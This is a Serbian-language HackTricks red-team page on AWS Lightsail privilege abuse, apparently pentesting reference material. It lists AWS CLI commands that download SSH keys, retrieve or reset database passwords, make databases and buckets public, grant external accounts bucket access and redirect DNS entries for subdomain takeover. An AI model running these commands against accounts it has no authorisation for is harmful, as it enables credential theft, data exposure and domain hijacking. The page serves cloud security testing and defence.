AWS - Lightsail Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Lightsail

Za više informacija o Lightsail-u pogledajte:

AWS - Lightsail Enum

Važno je napomenuti da Lightsail ne koristi IAM uloge koje pripadaju korisniku, već AWS upravljani nalog, tako da ne možete zloupotrebiti ovu uslugu za eskalaciju privilegija. Međutim, osetljivi podaci kao što su kod, API ključevi i informacije o bazi podataka mogu se pronaći u ovoj usluzi.

lightsail:DownloadDefaultKeyPair

Ova dozvola će vam omogućiti da dobijete SSH ključeve za pristup instancama:

aws lightsail download-default-key-pair

Potencijalni uticaj: Pronalaženje osetljivih informacija unutar instanci.

lightsail:GetInstanceAccessDetails

Ova dozvola će vam omogućiti generisanje SSH ključeva za pristup instancama:

aws lightsail get-instance-access-details --instance-name <instance_name>

Potencijalni uticaj: Pronalaženje osetljivih informacija unutar instanci.

lightsail:CreateBucketAccessKey

Ova dozvola će vam omogućiti da dobijete ključ za pristup korpi:

aws lightsail create-bucket-access-key --bucket-name <name>

Potencijalni uticaj: Pronalaženje osetljivih informacija unutar korpe.

lightsail:GetRelationalDatabaseMasterUserPassword

Ova dozvola će vam omogućiti da dobijete pristupne podatke za pristup bazi podataka:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Potencijalni uticaj: Pronalaženje osetljivih informacija unutar baze podataka.

lightsail:UpdateRelationalDatabase

Ova dozvola će vam omogućiti da promenite lozinku za pristup bazi podataka:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Ako baza podataka nije javna, takođe je možete učiniti javnom sa ovim dozvolama pomoću

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potencijalni uticaj: Pronalaženje osetljivih informacija unutar baze podataka.

lightsail:OpenInstancePublicPorts

Ova dozvola omogućava otvaranje portova ka internetu.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Potencijalni uticaj: Pristup osetljivim portovima.

lightsail:PutInstancePublicPorts

Ova dozvola omogućava otvaranje portova ka internetu. Napomena: poziv će zatvoriti sve portove koji nisu navedeni u njemu.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Potencijalni uticaj: Pristup osetljivim portovima.

lightsail:SetResourceAccessForBucket

Ova dozvola omogućava dodeljivanje pristupa instanci korisničkom sandučetu bez dodatnih akreditacija.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Potencijalni uticaj: Potencijalni novi pristup kantama sa osetljivim informacijama.

lightsail:UpdateBucket

Sa ovom dozvolom napadač bi mogao da dodeli svoj AWS nalog pristup za čitanje kanti ili čak da učini kante javnim za sve:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potencijalni uticaj: Potencijalni novi pristup kantama sa osetljivim informacijama.

lightsail:UpdateContainerService

Sa ovim dozvolama napadač bi mogao omogućiti pristup privatnim ECR-ima iz usluge kontejnera.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Potencijalni uticaj: Dobijanje osetljivih informacija iz privatnog ECR-a

lightsail:CreateDomainEntry

Napadač sa ovlašćenjem može kreirati poddomen i usmeriti ga ka svojoj IP adresi (preuzimanje poddomena), ili kreirati SPF zapis koji mu omogućava da lažira e-poštu sa domena, ili čak postaviti glavni domen na svoju IP adresu.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potencijalni uticaj: Preuzimanje domena

lightsail:UpdateDomainEntry

Napadač sa ovlašćenjem može kreirati poddomen i usmeriti ga ka svojoj IP adresi (preuzimanje poddomena), ili kreirati SPF zapis koji mu omogućava da lažira e-poštu sa domena, ili čak postaviti glavni domen na svoju IP adresu.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potencijalni uticaj: Preuzimanje domena

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated